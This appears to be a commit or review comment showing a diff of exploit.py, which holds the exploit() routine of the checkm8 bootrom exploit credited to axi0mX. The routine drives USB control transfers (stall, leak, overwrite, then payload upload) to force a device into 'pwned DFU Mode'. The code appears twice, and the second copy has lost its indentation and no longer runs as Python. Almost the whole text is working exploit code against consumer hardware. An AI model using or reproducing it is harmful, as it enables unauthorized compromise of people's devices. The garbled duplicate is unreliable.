ox1111 · January 6, 2021 01:50
diff --git a/exploit.py b/exploit.py
 def exploit():
    print('*** checkm8 exploit by axi0mX ***')

    device = dfu.acquire_device()
    start = time.time()
    print('Found:', device.serial_number)
    if 'PWND:[' in device.serial_number:
        print( 'Device is already in pwned DFU Mode. Not executing exploit.')
        return
    payload, config = exploit_config(device.serial_number)

    if config.large_leak is not None:
        usb_req_stall(device)
        for i in range(config.large_leak):
            usb_req_leak(device)
        usb_req_no_leak(device)
    else:
        stall(device)
        for i in range(config.hole):
            no_leak(device)
        usb_req_leak(device)
        no_leak(device)
    dfu.usb_reset(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    device.serial_number
    libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
    libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
    dfu.release_device(device)

    time.sleep(0.5)

    device = dfu.acquire_device()
    usb_req_stall(device)
    if config.large_leak is not None:
        usb_req_leak(device)
    else:
        for i in range(config.leak):
            usb_req_leak(device)
    libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, config.overwrite, 100)
    for i in range(0, len(payload), 0x800):
        libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, payload[i:i+0x800], 100)
    dfu.usb_reset(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    if 'PWND:[checkm8]' not in device.serial_number:
        print( 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.')
        sys.exit(1)
    print( 'Device is now in pwned DFU Mode.')
    print( '(%0.2f seconds)' % (time.time() - start))
    dfu.release_device(device)
	def exploit():
	print('* checkm8 exploit by axi0mX *')

	device = dfu.acquire_device()
	start = time.time()
	print('Found:', device.serial_number)
	if 'PWND:[' in device.serial_number:
	print( 'Device is already in pwned DFU Mode. Not executing exploit.')
	return
	payload, config = exploit_config(device.serial_number)

	if config.large_leak is not None:
	usb_req_stall(device)
	for i in range(config.large_leak):
	usb_req_leak(device)
	usb_req_no_leak(device)
	else:
	stall(device)
	for i in range(config.hole):
	no_leak(device)
	usb_req_leak(device)
	no_leak(device)
	dfu.usb_reset(device)
	dfu.release_device(device)

	device = dfu.acquire_device()
	device.serial_number
	libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
	libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
	dfu.release_device(device)

	time.sleep(0.5)

	device = dfu.acquire_device()
	usb_req_stall(device)
	if config.large_leak is not None:
	usb_req_leak(device)
	else:
	for i in range(config.leak):
	usb_req_leak(device)
	libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, config.overwrite, 100)
	for i in range(0, len(payload), 0x800):
	libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, payload[i:i+0x800], 100)
	dfu.usb_reset(device)
	dfu.release_device(device)

	device = dfu.acquire_device()
	if 'PWND:[checkm8]' not in device.serial_number:
	print( 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.')
	sys.exit(1)
	print( 'Device is now in pwned DFU Mode.')
	print( '(%0.2f seconds)' % (time.time() - start))
	dfu.release_device(device)